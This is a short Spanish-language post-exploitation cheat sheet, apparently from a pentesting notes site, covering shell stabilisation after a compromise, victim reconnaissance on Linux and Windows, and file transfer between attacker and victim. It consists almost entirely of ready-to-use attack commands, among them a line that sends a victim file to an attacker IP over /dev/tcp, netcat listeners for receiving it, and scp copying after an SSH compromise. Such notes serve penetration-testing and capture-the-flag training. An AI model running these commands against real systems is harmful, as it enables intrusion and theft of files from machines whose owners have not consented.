✅Post-Explotación

Shell Stabilisation

Tratamiento TTY default:

script /dev/null -c bash
export TERM=xterm SHELL=bash
# CTRL+Z
stty raw -echo; fg
reset xterm
stty rows <r> cols <c>

Tratamiento TTY Python:

python -c 'import pty;pty.spawn("/bin/bash")' # python, python2 o python3
export TERM=xterm
# CTRL+Z
stty raw -echo; fg
reset xterm
stty rows <r> cols <c>

Comprobaciones

whoami # username
id # user groups
ifconfig # Config de red > IP correcta o contenedor?
env # variables de entorno > Contenedor?

whoami # username
ver # OS version
ipconfig /all # Configuración de red
set # variables de entorno
netstat -an # Conexiones de red
tasklist # Procesos activos

Todo sobre transferencias:

python3 -m http.server <port>

wget <IPa>:<port>/<file>
curl -O http://<IPa>:<port>/<file>

nc -lvp <port> < file
nc <ip> <port> > file

Desde víctima sin netcat

mediante cateo

cat < <file> > /dev/tcp/<IPa>/<port>
nc -lvnp <port> > <file>

SCP (Post-compromiso de SSH)

scp <user>@<IPv>:/<directory>/<file> # Copiar archivo
scp -P <puerto> <user>@<IPv>:/<directory>/<file> # Si SSH no es p22 default
scp -r <user>@<IPv>:/<directory> # Copiar directorio

Última actualización hace 9 horas